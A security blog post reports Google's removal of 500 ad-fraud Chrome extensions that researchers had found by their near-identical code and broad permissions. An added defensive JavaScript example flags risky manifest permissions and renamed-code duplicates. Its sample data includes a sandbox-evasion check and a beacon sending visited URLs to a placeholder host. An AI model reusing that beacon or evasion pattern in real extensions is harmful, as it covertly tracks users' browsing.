Google removes 500 malicious Chrome Extensions

Google has removed 500 malicious extensions for the Chrome browser from its Web Store after security researchers issued a warning. Here are some details of what I know so far.

In the past I have also reported on Chrome browser extensions. But now I am a proponent of 'less is more'; too often I have had to report on compromised Android apps or browser extensions. In my blogs I try to minimize the number of WordPress plugins used; in my browsers there are no extensions at all, and if I need one, it is only activated for the time of use.

Through a tweet I became aware of a new case documented by Sophos security researchers. It was discovered by security researcher Jamila Kaya, who used Duo Security's CRXcavator tool (also available at CRXcavator.io) to investigate a handful of suspicious Chrome extensions. The extensions were mostly marketing and advertising tools.

First indication: near-identical code across extensions

Once she had a first suspicion, she started to analyze the extensions. While tracking down some questionable ones, she noticed that the code of one extension often looked like a copy of the code of another, with only small changes to the names of internal functions, apparently intended to hide the duplication. Another disturbing similarity was the set of permissions requested: the permissions gave the extensions access to users' browsing data and let them run on any website visited over HTTPS.
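Both indicators described above, overly broad permissions and code that is identical apart from renamed functions, can be checked mechanically. The following is an added example written for this post in JavaScript; it is not code from the original article, from Jamila Kaya's analysis or from CRXcavator. The manifest, the extension name "Coupon Finder Pro", the domain example.test and the three source snippets are constructed for illustration and are not taken from the reported extensions.

```javascript
// Added example, not from the original post, from the researcher's write-up or from CRXcavator.
// Two heuristics for triaging an unpacked Chrome extension offline:
//   1. flag manifest permissions that expose browsing data or every HTTPS site,
//   2. detect source files that are copies of each other apart from renamed identifiers.

// Match patterns that grant code access to (almost) every site the user visits.
const BROAD_HOSTS = ['<all_urls>', '*://*/*', 'https://*/*', 'http://*/*'];
// API permissions that expose browsing activity or let the extension intercept traffic.
const SENSITIVE_PERMS = ['tabs', 'webRequest', 'webRequestBlocking', 'webNavigation',
                         'history', 'cookies', 'management'];

// Returns a list of human-readable findings for a parsed manifest.json object.
// MV2 puts host patterns into "permissions"; MV3 uses "host_permissions";
// content_scripts[].matches grants injection on matching pages in both versions.
function assessManifest(manifest) {
  const findings = [];
  const perms = manifest.permissions || [];
  const hosts = [
    ...perms,
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap(cs => cs.matches || []),
  ];
  for (const h of hosts) {
    if (BROAD_HOSTS.includes(h)) findings.push(`broad host access: ${h}`);
  }
  for (const p of perms) {
    if (SENSITIVE_PERMS.includes(p)) findings.push(`sensitive permission: ${p}`);
  }
  return findings;
}

const JS_KEYWORDS = new Set(('break case catch class const continue debugger default delete do ' +
  'else export extends finally for function if import in instanceof let new return super switch ' +
  'this throw try typeof var void while with yield async await of true false null undefined').split(' '));

// One regex for comments, string literals, identifiers, numbers and single punctuation chars.
// (Regex literals and template strings are not handled; enough for a triage heuristic.)
const TOKEN_RE = /\/\/[^\n]*|\/\*[\s\S]*?\*\/|"(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*'|[A-Za-z_$][\w$]*|\d+(?:\.\d+)?|[^\s\w$]/g;

// Canonical form of a source file: comments and whitespace dropped, every identifier
// replaced by a placeholder numbered in order of first appearance. Renaming a function
// therefore does not change the result, while a change of logic or of a literal does.
function normalizeSource(src) {
  const names = new Map();
  const out = [];
  for (const tok of src.match(TOKEN_RE) || []) {
    if (tok.startsWith('//') || tok.startsWith('/*')) continue;       // comment
    if (/^[A-Za-z_$]/.test(tok) && !JS_KEYWORDS.has(tok)) {            // identifier
      if (!names.has(tok)) names.set(tok, `id${names.size}`);
      out.push(names.get(tok));
    } else {
      out.push(tok);                                                   // keyword, literal, punctuation
    }
  }
  return out.join(' ');
}

function sameCodeModuloNames(a, b) {
  return normalizeSource(a) === normalizeSource(b);
}

// --- constructed sample data (hypothetical extension, not one from the report) ---
const suspiciousManifest = {
  manifest_version: 2,
  name: 'Coupon Finder Pro',
  permissions: ['tabs', 'webRequest', 'webRequestBlocking', 'https://*/*', 'storage'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};

const extA = `
// original
function checkSandbox() { if (navigator.webdriver) return true; return false; }
function beacon(u) { fetch("https://example.test/ping?u=" + encodeURIComponent(u)); }
`;
// Same logic with the function names changed and whitespace removed.
const extB = `
function qx71(){if(navigator.webdriver)return true;return false;}
function zz_a(u){fetch("https://example.test/ping?u="+encodeURIComponent(u));}
`;
// Different behaviour: no beacon to a remote host.
const extC = `
function checkSandbox() { if (navigator.webdriver) return true; return false; }
function beacon(u) { console.log(u); }
`;

console.log(assessManifest(suspiciousManifest));
console.log('A ~ B:', sameCodeModuloNames(extA, extB), ' A ~ C:', sameCodeModuloNames(extA, extC));
```

Run against a directory of unpacked .crx files, the same normalization lets you group hundreds of extensions into families by hashing the canonical form; the manifest check is a first filter, since many legitimate extensions also ask for broad host access.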

A whole collection of suspicious extensions

In cooperation with Duo Security, the researcher eventually identified 70 extensions that appeared to be related to each other. All of them contacted similar command-and-control infrastructure and seemed designed to detect and evade sandbox analysis.

The extensions were aimed at advertising fraud: they contacted domains without the users' knowledge and redirected users to malware and phishing domains. Many of these Chrome extensions had been available from the store for almost a year, and some have been shown to have been around for much longer.

Google removes the extensions

After the security researcher contacted Google, all 500 extensions were thrown out of the store. Google confirmed the 70 originally reported extensions as violating its policies, updated its detection signatures and found further extensions with the same code and behaviour, so that in the end 500 extensions were removed. Google writes about this:

We regularly scan the store to find extensions with similar techniques, code, and behavior, and we remove those extensions if they violate our policies.

In this particular case, however, those scans had evidently not caught the extensions before an outside researcher reported them. Google's Chrome Web Store has about 190,000 extensions, which puts the 500 dubious extensions now removed into perspective. A report from Extension Monitor last August estimated that three-quarters of the 190,000 extensions had between zero and a handful of installations. The extensions discovered by Duo Security and Kaya had been installed a total of 1.7 million times. Anyone who uses browser extensions should take care not to install ones from obscure providers.

This entry was posted in browser, Security, Software.